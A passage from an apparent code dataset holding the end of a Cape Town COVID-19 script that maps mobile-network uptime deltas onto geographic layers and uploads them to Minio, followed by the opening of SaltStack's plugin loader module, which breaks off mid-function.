HOURLY_METRIC_POLYGON_ID], inplace=True)\n mobile_data_df.sort_index(inplace=True)\n\n return mobile_data_df\n\n\ndef temporal_filter(mobile_data_df,\n window_start=TEMPORAL_FILTER_WINDOW, window_end=None,\n filter_start=None, filter_end=None):\n filter_start = mobile_data_df.index.get_level_values(TIMESTAMP_COL).max() if filter_start is None else filter_start\n filter_start = (filter_start - window_start) if window_start else filter_start\n\n filter_end = mobile_data_df.index.get_level_values(TIMESTAMP_COL).max() if filter_end is None else filter_end\n filter_end = (filter_end - window_end) if window_end else filter_end\n logging.debug(f\"Temporal filter range: {filter_start} to {filter_end}\")\n\n filter_slice = pandas.IndexSlice[filter_start:filter_end, :]\n\n return mobile_data_df.loc[filter_slice]\n\n\ndef calculate_delta_df(mobile_data_df):\n def calculate_date_delta(polygon_df):\n # Start off with the median uptime and downtime values for each polygon\n result_df = pandas.Series({**{\n UPTIME_COL_PREFIX + col: (\n polygon_df[UPTIME_COL_PREFIX + col].median()\n if polygon_df[UPTIME_COL_PREFIX + col].notna().any()\n else DEVICE_COUNT_THRESHOLD\n )\n for col in DESCRIBE_COL_SUFFIXES\n }, **{\n DOWNTIME_COL_PREFIX + col: (\n polygon_df[DOWNTIME_COL_PREFIX + col].median()\n if polygon_df[DOWNTIME_COL_PREFIX + col].notna().any()\n else DEVICE_COUNT_THRESHOLD\n )\n for col in DESCRIBE_COL_SUFFIXES\n }})\n\n # Initial delta calculation - uptime - downtime\n result_df = result_df.append(pandas.Series({\n DELTA_SUFFIX + col: result_df[UPTIME_COL_PREFIX + col] - result_df[DOWNTIME_COL_PREFIX + col]\n for col in DESCRIBE_COL_SUFFIXES\n }))\n\n # Relative delta increase - delta / downtime\n result_df = result_df.append(pandas.Series({\n RELATIVE_DELTA_PREFIX + col: result_df.loc[DELTA_SUFFIX + col] / result_df.loc[DOWNTIME_COL_PREFIX + col]\n for col in PLOT_COL_SUFFIXES\n }))\n\n # Percent increase - relative_delta*100, rounded off\n result_df = result_df.append(pandas.Series({\n RELATIVE_DELTA_PERCENT_PREFIX + col: (result_df.loc[RELATIVE_DELTA_PREFIX + col] * 100).round(0)\n for col in PLOT_COL_SUFFIXES\n }))\n\n return result_df\n\n delta_df = mobile_data_df.groupby(HOURLY_METRIC_POLYGON_ID).apply(calculate_date_delta)\n logging.debug(f\"delta_df=\\n{delta_df}\")\n\n return delta_df\n\n\ndef delta_df_to_gdf(delta_df, polygon_gdf):\n delta_gdf = polygon_gdf.merge(\n delta_df,\n left_on=POLYGON_ID_COL, right_index=True,\n validate=\"1:1\"\n )\n\n return delta_gdf\n\n\ndef remap_gdf(gdf1, gdf2, gdf1_cols):\n # Creating the source density GDF, with density measures\n source_gdf = gdf1.copy()\n for col in gdf1_cols:\n source_gdf[col] = gdf1[col] / gdf1.geometry.area\n\n remap_gdf = gdf2.copy()\n remap_gdf[\"RemapIndex\"] = gdf2.index.to_series()\n\n # Getting the intersection between the two - basically the spatial outer join of the two GDFs\n source_gdf.sindex, remap_gdf.sindex\n intersection_gdf = geopandas.overlay(\n source_gdf.to_crs(remap_gdf.crs),\n remap_gdf,\n how='intersection'\n )\n\n # Function for finding the new value for each column\n def remap_func(group_gdf):\n weights = group_gdf.geometry.area\n\n new_vals = pandas.Series(\n {\n col: numpy.average(group_gdf[col], weights=weights)\n for col in gdf1_cols\n }\n )\n\n return new_vals\n\n # Aggregating on the new GDF's index\n aggregation_df = intersection_gdf.groupby(by=\"RemapIndex\").apply(remap_func)\n aggregation_geometry = gdf2.geometry\n # Turning the density back to an absolute measure\n for col in gdf1_cols:\n aggregation_df[col] = (aggregation_df[col] * aggregation_geometry.area)\n\n if RELATIVE_DELTA_PERCENT_PREFIX in col:\n aggregation_df[col] = aggregation_df[col].round(0)\n\n new_gdf = geopandas.GeoDataFrame(aggregation_df, geometry=aggregation_geometry)\n new_gdf.index.name = gdf2.index.name\n\n return new_gdf\n\n\ndef normalise_gdf(data_gdf):\n # Normalised Values\n output_gdf = data_gdf.merge(\n pandas.DataFrame({**{\n NORM_PREFIX + UPTIME_COL_PREFIX + col: (data_gdf[UPTIME_COL_PREFIX + col]\n / data_gdf[UPTIME_COL_PREFIX + col].max()).round(3)\n for col in PLOT_COL_SUFFIXES\n }, **{\n NORM_PREFIX + DOWNTIME_COL_PREFIX + col: (data_gdf[DOWNTIME_COL_PREFIX + col]\n / data_gdf[DOWNTIME_COL_PREFIX + col].max()).round(3)\n for col in PLOT_COL_SUFFIXES\n }}, index=data_gdf.index),\n left_index=True, right_index=True, validate=\"one_to_one\",\n )\n\n return output_gdf\n\n\ndef compress_gdf(delta_gdf):\n # Removing what we can\n logging.debug(f\"(Before compression) delta_gdf.shape={delta_gdf.shape}\")\n delta_gdf.dropna(how=\"all\", inplace=True)\n logging.debug(f\"(After compression) delta_gdf.shape={delta_gdf.shape}\")\n\n return delta_gdf\n\n\ndef write_delta_gdf_to_disk(delta_gdf, tempdir, delta_filename):\n local_path = os.path.join(tempdir, delta_filename)\n delta_gdf.reset_index().to_file(local_path, driver='GeoJSON')\n\n return local_path, delta_gdf\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s-%(module)s.%(funcName)s [%(levelname)s]: %(message)s')\n\n # Loading secrets\n SECRETS_PATH_VAR = \"SECRETS_PATH\"\n\n if SECRETS_PATH_VAR not in os.environ:\n sys.exit(-1)\n\n secrets_path = os.environ[\"SECRETS_PATH\"]\n secrets = json.load(open(secrets_path))\n\n district_file_prefix = sys.argv[1]\n district_name = sys.argv[2]\n\n subdistrict_file_prefix = sys.argv[3]\n subdistrict_name = sys.argv[4]\n logging.info(f\"Generat[ing] map layers for '{district_name}' district, '{subdistrict_name}' subdistrict\")\n\n # Has to be in the outer scope as the tempdir is used in multiple places\n with tempfile.TemporaryDirectory() as tempdir:\n logging.info(\"G[etting] layers\")\n map_layers_dict = {\n layer: (local_path, layer_gdf)\n for layer, local_path, layer_gdf in city_map_layers_to_minio.get_layers(tempdir,\n secrets[\"minio\"][\"edge\"][\"access\"],\n secrets[\"minio\"][\"edge\"][\"secret\"],\n LAYER_FILES,\n secrets[\"minio\"][\"lake\"][\"access\"],\n secrets[\"minio\"][\"lake\"][\"secret\"],)\n }\n logging.info(\"G[ot] layers\")\n\n logging.info(\"G[etting] Mobile Data\")\n mobile_df = get_mobile_data(secrets[\"minio\"][\"edge\"][\"access\"],\n secrets[\"minio\"][\"edge\"][\"secret\"])\n logging.info(\"G[ot] Mobile Data\")\n\n logging.info(\"Temporally Filter[ing] data\")\n filtered_df = temporal_filter(mobile_df)\n logging.info(\"Temporally Filter[ed] data \")\n\n logging.info(\"Calculat[ing] delta data\")\n mobile_delta_df = calculate_delta_df(filtered_df)\n logging.info(\"Calculat[ed] delta data\")\n\n logging.info(\"Spatialis[ing] delta data\")\n _, vodacom_polygon_gdf = map_layers_dict[CT_VODACOM_POLYGONS]\n mobile_delta_gdf = delta_df_to_gdf(mobile_delta_df, vodacom_polygon_gdf)\n logging.info(\"Spatialis[ed] delta data\")\n\n # Generating choropleths based upon delta gdf\n for layer_suffix in CHOROPLETH_LAYERS:\n layer_filename = f\"{district_file_prefix}_{subdistrict_file_prefix}_{layer_suffix}\"\n\n gdf_property, sanitise_func = CHOROPLETH_COL_LOOKUP[layer_suffix]\n logging.debug(f\"gdf_property={gdf_property}\")\n\n logging.info(f\"Remapp[ing] cases for '{layer_filename}'\")\n source_layer = CHOROPLETH_SOURCE_LAYERS[layer_suffix]\n _, target_gdf = map_layers_dict[source_layer]\n target_gdf.set_index(gdf_property, inplace=True)\n\n remapped_delta_gdf = remap_gdf(mobile_delta_gdf, target_gdf,\n [col for col in mobile_delta_df.columns if col != \"geometry\"]).reset_index()\n # Ugly hack to fix issue with indices\n remapped_delta_gdf.index.name = \"dummy_index\"\n\n logging.info(f\"Remapp[ed] cases for '{layer_filename}'\")\n\n logging.info(\"Normalis[ing] data\")\n normalised_gdf = normalise_gdf(remapped_delta_gdf)\n logging.info(\"Normalis[ed] data\")\n\n logging.info(f\"Writ[ing] geojson for '{layer_filename}'\")\n count_layer_values = write_delta_gdf_to_disk(normalised_gdf, tempdir, layer_filename)\n map_layers_dict[layer_filename] = count_layer_values\n logging.info(f\"Wr[ote] geojson for '{layer_filename}'\")\n\n logging.info(\"Writ[ing] layers to Minio\")\n del map_layers_dict[CT_VODACOM_POLYGONS]\n city_map_layers_to_minio.write_layers_to_minio(map_layers_dict,\n secrets[\"minio\"][\"edge\"][\"access\"],\n secrets[\"minio\"][\"edge\"][\"secret\"])\n logging.info(\"Wr[ote] layers to Minio\")\n","repo_name":"cityofcapetown/covid-19-widgets","sub_path":"mobile_data_map_layers_to_minio.py","file_name":"mobile_data_map_layers_to_minio.py","file_ext":"py","file_size_in_byte":13546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12846387564","text":"\"\"\"\nThe Salt loader is the core to Salt's plugin system, the loader scans\ndirectories for python loadable code and organizes the code into the\nplugin interfaces used by Salt.\n\"\"\"\n\nimport contextlib\nimport inspect\nimport logging\nimport os\nimport re\nimport time\nimport types\n\nimport salt.config\nimport salt.defaults.events\nimport salt.defaults.exitcodes\nimport salt.loader.context\nimport salt.syspaths\nimport salt.utils.context\nimport salt.utils.data\nimport salt.utils.dictupdate\nimport salt.utils.event\nimport salt.utils.files\nimport salt.utils.lazy\nimport salt.utils.odict\nimport salt.utils.platform\nimport salt.utils.stringutils\nimport salt.utils.versions\nfrom salt.exceptions import LoaderError\nfrom salt.template import check_render_pipe_str\nfrom salt.utils import entrypoints\n\nfrom .lazy import SALT_BASE_PATH, FilterDictWrapper, LazyLoader\n\nlog = logging.getLogger(__name__)\n\n# Because on the cloud drivers we do `from salt.cloud.libcloudfuncs import *`\n# which simplifies code readability, it adds some unsupported functions into\n# the driver's module scope.\n# We list un-supported functions here. These will be removed from the loaded.\n# TODO: remove the need for this cross-module code. Maybe use NotImplemented\nLIBCLOUD_FUNCS_NOT_SUPPORTED = (\n \"parallels.avail_sizes\",\n \"parallels.avail_locations\",\n \"proxmox.avail_sizes\",\n)\n\nSALT_INTERNAL_LOADERS_PATHS = (\n str(SALT_BASE_PATH / \"auth\"),\n str(SALT_BASE_PATH / \"beacons\"),\n str(SALT_BASE_PATH / \"cache\"),\n str(SALT_BASE_PATH / \"client\" / \"ssh\" / \"wrapper\"),\n str(SALT_BASE_PATH / \"cloud\" / \"clouds\"),\n str(SALT_BASE_PATH / \"engines\"),\n str(SALT_BASE_PATH / \"executors\"),\n str(SALT_BASE_PATH / \"fileserver\"),\n str(SALT_BASE_PATH / \"grains\"),\n str(SALT_BASE_PATH / \"log_handlers\"),\n str(SALT_BASE_PATH / \"matchers\"),\n str(SALT_BASE_PATH / \"metaproxy\"),\n str(SALT_BASE_PATH / \"modules\"),\n str(SALT_BASE_PATH / \"netapi\"),\n str(SALT_BASE_PATH / \"output\"),\n str(SALT_BASE_PATH / \"pillar\"),\n str(SALT_BASE_PATH / \"proxy\"),\n str(SALT_BASE_PATH / \"queues\"),\n str(SALT_BASE_PATH / \"renderers\"),\n str(SALT_BASE_PATH / \"returners\"),\n str(SALT_BASE_PATH / \"roster\"),\n str(SALT_BASE_PATH / \"runners\"),\n str(SALT_BASE_PATH / \"sdb\"),\n str(SALT_BASE_PATH / \"serializers\"),\n str(SALT_BASE_PATH / \"spm\" / \"pkgdb\"),\n str(SALT_BASE_PATH / \"spm\" / \"pkgfiles\"),\n str(SALT_BASE_PATH / \"states\"),\n str(SALT_BASE_PATH / \"thorium\"),\n str(SALT_BASE_PATH / \"tokens\"),\n str(SALT_BASE_PATH / \"tops\"),\n str(SALT_BASE_PATH / \"utils\"),\n str(SALT_BASE_PATH / \"wheel\"),\n)\n\n\ndef static_loader(\n opts,\n ext_type,\n tag,\n pack=None,\n int_type=None,\n ext_dirs=True,\n ext_type_dirs=None,\n base_path=None,\n filter_name=None,\n loaded_base_name=None,\n):\n funcs = LazyLoader(\n _module_dirs(\n opts,\n ext_type,\n tag,\n int_type,\n ext_dirs,\n ext_type_dirs,\n base_path,\n ),\n opts,\n tag=tag,\n pack=pack,\n loaded_base_name=loaded_base_name,\n )\n ret = {}\n funcs._load_all()\n if filter_name:\n funcs = FilterDictWrapper(funcs, filter_name)\n for key in funcs:\n ret[key] = funcs[key]\n return ret\n\n\ndef _module_dirs(\n opts,\n ext_type,\n tag=None,\n int_type=None,\n ext_dirs=True,\n ext_type_dirs=None,\n base_path=None,\n load_extensions=True,\n):\n if tag is None:\n tag = ext_type\n sys_types = os.path.join(base_path or str(SALT_BASE_PATH), int_type or ext_type)\n return_types = [sys_types]\n if opts.get(\"extension_modules\"):\n ext_types = os.path.join(opts[\"extension_modules\"], ext_type)\n return_types.insert(0, ext_types)\n\n if not sys_types.startswith(SALT_INTERNAL_LOADERS_PATHS):\n raise RuntimeError(\n \"{!r} is not considered a salt internal loader path. If this \"\n \"is a new loader being added, please also add it to \"\n \"{}.SALT_INTERNAL_LOADERS_PATHS.\".format(sys_types, __name__)\n )\n\n ext_type_types = []\n if ext_dirs:\n if ext_type_dirs is None:\n ext_type_dirs = f\"{tag}_dirs\"\n if ext_type_dirs in opts:\n ext_type_types.extend(opts[ext_type_dirs])\n if ext_type_dirs and load_extensions is True:\n for entry_point in entrypoints.iter_entry_points(\"salt.loader\"):\n with catch_entry_points_exception(entry_point) as ctx:\n loaded_entry_point = entry_point.load()\n if ctx.exception_caught:\n continue\n\n # Old way of defining loader entry points\n # [options.entry_points]\n # salt.loader=\n # runner_dirs = thirpartypackage.loader:func_to_get_list_of_dirs\n # module_dirs = thirpartypackage.loader:func_to_get_list_of_dirs\n #\n #\n # New way of defining entrypoints\n # [options.entry_points]\n # salt.loader=\n # = thirpartypackage\n # = thirpartypackage:callable\n #\n # We try and see if the thirpartypackage has a `ext_type` sub module, and if so,\n # we append it to loaded_entry_point_paths.\n # If the entry-point is in the form of `thirpartypackage:callable`, the return of that\n # callable must be a dictionary where the keys are the `ext_type`'s and the values must be\n # lists of paths.\n\n # We could feed the paths we load directly to `ext_type_types`, but we would not\n # check for duplicates\n loaded_entry_point_paths = set()\n\n if isinstance(loaded_entry_point, types.FunctionType):\n # If the entry point object is a function, we have two scenarios\n # 1: It returns a list; This is an old style entry entry_point\n # 2: It returns a dictionary; This is a new style entry point\n with catch_entry_points_exception(entry_point) as ctx:\n loaded_entry_point_value = loaded_entry_point()\n if ctx.exception_caught:\n continue\n\n if isinstance(loaded_entry_point_value, dict):\n # This is new style entry-point and it returns a dictionary.\n # It MUST contain `ext_type` in it's keys to be considered\n if ext_type not in loaded_entry_point_value:\n continue\n with catch_entry_points_exception(entry_point) as ctx:\n if isinstance(loaded_entry_point_value[ext_type], str):\n # No strings please!\n raise ValueError(\n \"The callable must return an iterable of strings. \"\n \"A single string is not supported.\"\n )\n for path in loaded_entry_point_value[ext_type]:\n loaded_entry_point_paths.add(path)\n else:\n # This is old style entry-point, and, as such, the entry point name MUST\n # match the value of `ext_type_dirs\n if entry_point.name != ext_type_dirs:\n continue\n for path in loaded_entry_point_value:\n loaded_entry_point_paths.add(path)\n elif isinstance(loaded_entry_point, types.ModuleType):\n # This is a new style entry points definition which just points us to a package\n #\n # We try and see if the thirpartypackage has a `ext_type` sub module, and if so,\n # we append it to loaded_entry_point_paths.\n for loaded_entry_point_path in loaded_entry_point.__path__:\n with catch_entry_points_exception(entry_point) as ctx:\n entry_point_ext_type_package_path = os.path.join(\n loaded_entry_point_path, ext_type\n )\n if not os.path.exists(entry_point_ext_type_package_path):\n continue\n if ctx.exception_caught:\n continue\n loaded_entry_point_paths.add(entry_point_ext_type_package_path)\n else:\n with catch_entry_points_exception(entry_point):\n raise ValueError(\n \"Don't know how to load a salt extension from {}\".format(\n loaded_entry_point\n )\n )\n\n # Finally, we check all paths that we collected to see if they exist\n for path in loaded_entry_point_paths:\n if os.path.exists(path):\n ext_type_types.append(path)\n\n cli_module_dirs = []\n # The dirs can be any module dir, or a in-tree _{ext_type} dir\n for _dir in opts.get(\"module_dirs\", []):\n # Prepend to the list to match cli argument ordering\n maybe_dir = os.path.join(_dir, ext_type)\n if os.path.isdir(maybe_dir):\n cli_module_dirs.insert(0, maybe_dir)\n continue\n\n maybe_dir = os.path.join(_dir, f\"_{ext_type}\")\n if os.path.isdir(maybe_dir):\n cli_module_dirs.insert(0, maybe_dir)\n\n return cli_module_dirs + ext_type_types + return_types\n\n\ndef minion_mods(\n opts,\n context=None,\n utils=None,\n whitelist=None,\n initial_load=False,\n loaded_base_name=None,\n notify=False,\n static_modules=None,\n proxy=None,\n file_client=None,\n):\n \"\"\"\n Load execution modules\n\n Returns a dictionary of execution modules appropriate for the current\n system by evaluating the __virtual__() function in each module.\n\n :param dict opts: The Salt options dictionary\n\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n\n :param dict utils: Utility functions which should be made available to\n Salt modules in __utils__. See `utils_dirs` in\n salt.config for additional information about\n configuration.\n\n :param list whitelist: A list of modules which should be whitelisted.\n :param bool initial_load: Deprecated flag! Unused.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n :param bool notify: Flag indicating that an event should be fired upon\n completion of module loading.\n\n\n Example:\n\n .. code-block:: python\n\n import salt.config\n import salt.loader\n\n __opts__ = salt.config.minion_config('/etc/salt/minion')\n __grains__ = salt.loader.grains(__opts__)\n __opts__['grains'] = __grains__\n __utils__ = salt.loader.utils(__opts__)\n __salt__ = salt.loader.minion_mods(__opts__, utils=__utils__)\n __salt__['test.ping']()\n \"\"\"\n # TODO Publish documentation for module whitelisting\n if not whitelist:\n whitelist = opts.get(\"whitelist_modules\", None)\n ret = LazyLoader(\n _module_dirs(opts, \"modules\", \"module\"),\n opts,\n tag=\"module\",\n pack={\n \"__context__\": context,\n \"__utils__\": utils,\n \"__proxy__\": proxy,\n \"__opts__\": opts,\n \"__file_client__\": file_client,\n },\n whitelist=whitelist,\n loaded_base_name=loaded_base_name,\n static_modules=static_modules,\n extra_module_dirs=utils.module_dirs if utils else None,\n pack_self=\"__salt__\",\n )\n\n # Load any provider overrides from the configuration file providers option\n # Note: Providers can be pkg, service, user or group - not to be confused\n # with cloud providers.\n providers = opts.get(\"providers\", False)\n if providers and isinstance(providers, dict):\n for mod in providers:\n # sometimes providers opts is not to diverge modules but\n # for other configuration\n try:\n funcs = raw_mod(opts, providers[mod], ret)\n except TypeError:\n break\n else:\n if funcs:\n for func in funcs:\n f_key = \"{}{}\".format(mod, func[func.rindex(\".\") :])\n ret[f_key] = funcs[func]\n\n if notify:\n with salt.utils.event.get_event(\"minion\", opts=opts, listen=False) as evt:\n evt.fire_event(\n {\"complete\": True}, tag=salt.defaults.events.MINION_MOD_REFRESH_COMPLETE\n )\n\n return ret\n\n\ndef raw_mod(opts, name, functions, mod=\"modules\", loaded_base_name=None):\n \"\"\"\n Returns a single module loaded raw and bypassing the __virtual__ function\n\n :param dict opts: The Salt options dictionary\n :param str name: The name of the module to load\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param str mod: The extension type.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n\n Example:\n\n .. code-block:: python\n\n import salt.config\n import salt.loader\n\n __opts__ = salt.config.minion_config('/etc/salt/minion')\n testmod = salt.loader.raw_mod(__opts__, 'test', None)\n testmod['test.ping']()\n \"\"\"\n loader = LazyLoader(\n _module_dirs(opts, mod, \"module\"),\n opts,\n tag=\"rawmodule\",\n virtual_enable=False,\n pack={\"__salt__\": functions},\n loaded_base_name=loaded_base_name,\n )\n # if we don't have the module, return an empty dict\n if name not in loader.file_mapping:\n return {}\n\n # load a single module (the one passed in)\n loader._load_module(name)\n # return a copy of *just* the funcs for `name`\n return dict({x: loader[x] for x in loader._dict})\n\n\ndef metaproxy(opts, loaded_base_name=None):\n \"\"\"\n Return functions used in the meta proxy\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"metaproxy\"),\n opts,\n tag=\"metaproxy\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef matchers(opts, loaded_base_name=None):\n \"\"\"\n Return the matcher services plugins\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"matchers\"),\n opts,\n tag=\"matchers\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef engines(opts, functions, runners, utils, proxy=None, loaded_base_name=None):\n \"\"\"\n Return the engines plugins\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param LazyLoader runners: A LazyLoader instance returned from ``runner``.\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n pack = {\n \"__salt__\": functions,\n \"__runners__\": runners,\n \"__proxy__\": proxy,\n \"__utils__\": utils,\n }\n return LazyLoader(\n _module_dirs(opts, \"engines\"),\n opts,\n tag=\"engines\",\n pack=pack,\n extra_module_dirs=utils.module_dirs if utils else None,\n loaded_base_name=loaded_base_name,\n )\n\n\ndef proxy(\n opts,\n functions=None,\n returners=None,\n whitelist=None,\n utils=None,\n context=None,\n pack_self=\"__proxy__\",\n loaded_base_name=None,\n):\n \"\"\"\n Returns the proxy module for this salt-proxy-minion\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param LazyLoader returners: A LazyLoader instance returned from ``returners``.\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"proxy\"),\n opts,\n tag=\"proxy\",\n pack={\n \"__salt__\": functions,\n \"__ret__\": returners,\n \"__utils__\": utils,\n \"__context__\": context,\n },\n extra_module_dirs=utils.module_dirs if utils else None,\n pack_self=pack_self,\n loaded_base_name=loaded_base_name,\n )\n\n\ndef returners(\n opts, functions, whitelist=None, context=None, proxy=None, loaded_base_name=None\n):\n \"\"\"\n Returns the returner modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param list whitelist: A list of modules which should be whitelisted.\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"returners\", \"returner\"),\n opts,\n tag=\"returner\",\n whitelist=whitelist,\n pack={\"__salt__\": functions, \"__context__\": context, \"__proxy__\": proxy or {}},\n loaded_base_name=loaded_base_name,\n )\n\n\ndef utils(\n opts,\n whitelist=None,\n context=None,\n proxy=None,\n pack_self=None,\n loaded_base_name=None,\n):\n \"\"\"\n Returns the utility modules\n\n :param dict opts: The Salt options dictionary\n :param list whitelist: A list of modules which should be whitelisted.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"utils\", ext_type_dirs=\"utils_dirs\", load_extensions=False),\n opts,\n tag=\"utils\",\n whitelist=whitelist,\n pack={\"__context__\": context, \"__proxy__\": proxy or {}},\n pack_self=pack_self,\n loaded_base_name=loaded_base_name,\n _only_pack_properly_namespaced_functions=False,\n )\n\n\ndef pillars(opts, functions, context=None, loaded_base_name=None):\n \"\"\"\n Returns the pillars modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n _utils = utils(opts)\n ret = LazyLoader(\n _module_dirs(opts, \"pillar\"),\n opts,\n tag=\"pillar\",\n pack={\"__salt__\": functions, \"__context__\": context, \"__utils__\": _utils},\n extra_module_dirs=_utils.module_dirs,\n pack_self=\"__ext_pillar__\",\n loaded_base_name=loaded_base_name,\n )\n return FilterDictWrapper(ret, \".ext_pillar\")\n\n\ndef tops(opts, loaded_base_name=None):\n \"\"\"\n Returns the tops modules\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if \"master_tops\" not in opts:\n return {}\n whitelist = list(opts[\"master_tops\"].keys())\n ret = LazyLoader(\n _module_dirs(opts, \"tops\", \"top\"),\n opts,\n tag=\"top\",\n whitelist=whitelist,\n loaded_base_name=loaded_base_name,\n )\n return FilterDictWrapper(ret, \".top\")\n\n\ndef wheels(opts, whitelist=None, context=None, loaded_base_name=None):\n \"\"\"\n Returns the wheels modules\n\n :param dict opts: The Salt options dictionary\n :param list whitelist: A list of modules which should be whitelisted.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if context is None:\n context = {}\n return LazyLoader(\n _module_dirs(opts, \"wheel\"),\n opts,\n tag=\"wheel\",\n whitelist=whitelist,\n pack={\"__context__\": context},\n loaded_base_name=loaded_base_name,\n )\n\n\ndef outputters(opts, loaded_base_name=None):\n \"\"\"\n Returns the outputters modules\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n :returns: LazyLoader instance, with only outputters present in the keyspace\n \"\"\"\n ret = LazyLoader(\n _module_dirs(opts, \"output\", ext_type_dirs=\"outputter_dirs\"),\n opts,\n tag=\"output\",\n loaded_base_name=loaded_base_name,\n )\n wrapped_ret = FilterDictWrapper(ret, \".output\")\n # TODO: this name seems terrible... __salt__ should always be execution mods\n ret.pack[\"__salt__\"] = wrapped_ret\n return wrapped_ret\n\n\ndef serializers(opts, loaded_base_name=None):\n \"\"\"\n Returns the serializers modules\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n :returns: LazyLoader instance, with only serializers present in the keyspace\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"serializers\"),\n opts,\n tag=\"serializers\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef eauth_tokens(opts, loaded_base_name=None):\n \"\"\"\n Returns the tokens modules\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n :returns: LazyLoader instance, with only token backends present in the keyspace\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"tokens\"),\n opts,\n tag=\"tokens\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef auth(opts, whitelist=None, loaded_base_name=None):\n \"\"\"\n Returns the auth modules\n\n :param dict opts: The Salt options dictionary\n\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param list whitelist: A list of modules which should be whitelisted.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n :returns: LazyLoader\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"auth\"),\n opts,\n tag=\"auth\",\n whitelist=whitelist,\n pack={\"__salt__\": minion_mods(opts)},\n loaded_base_name=loaded_base_name,\n )\n\n\ndef fileserver(opts, backends, loaded_base_name=None):\n \"\"\"\n Returns the file server modules\n\n :param dict opts: The Salt options dictionary\n :param list backends: List of backends to load.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n _utils = utils(opts)\n\n if backends is not None:\n if not isinstance(backends, list):\n backends = [backends]\n\n # If backend is a VCS, add both the '-fs' and non '-fs' versions to the list.\n # Use a set to keep them unique\n backend_set = set()\n vcs_re = re.compile(\"^(git|svn|hg)(?:fs)?$\")\n for backend in backends:\n match = vcs_re.match(backend)\n if match:\n backend_set.add(match.group(1))\n backend_set.add(match.group(1) + \"fs\")\n else:\n backend_set.add(backend)\n backends = list(backend_set)\n\n return LazyLoader(\n _module_dirs(opts, \"fileserver\"),\n opts,\n tag=\"fileserver\",\n whitelist=backends,\n pack={\"__utils__\": _utils},\n extra_module_dirs=_utils.module_dirs,\n loaded_base_name=loaded_base_name,\n )\n\n\ndef roster(opts, runner=None, utils=None, whitelist=None, loaded_base_name=None):\n \"\"\"\n Returns the roster modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader runner: A LazyLoader instance returned from ``runner``.\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param list whitelist: A list of modules which should be whitelisted.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"roster\"),\n opts,\n tag=\"roster\",\n whitelist=whitelist,\n pack={\"__runner__\": runner, \"__utils__\": utils},\n extra_module_dirs=utils.module_dirs if utils else None,\n loaded_base_name=loaded_base_name,\n )\n\n\ndef thorium(opts, functions, runners, loaded_base_name=None):\n \"\"\"\n Load the thorium runtime modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param LazyLoader runners: A LazyLoader instance returned from ``runner``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n pack = {\"__salt__\": functions, \"__runner__\": runners, \"__context__\": {}}\n ret = LazyLoader(\n _module_dirs(opts, \"thorium\"),\n opts,\n tag=\"thorium\",\n pack=pack,\n loaded_base_name=loaded_base_name,\n )\n 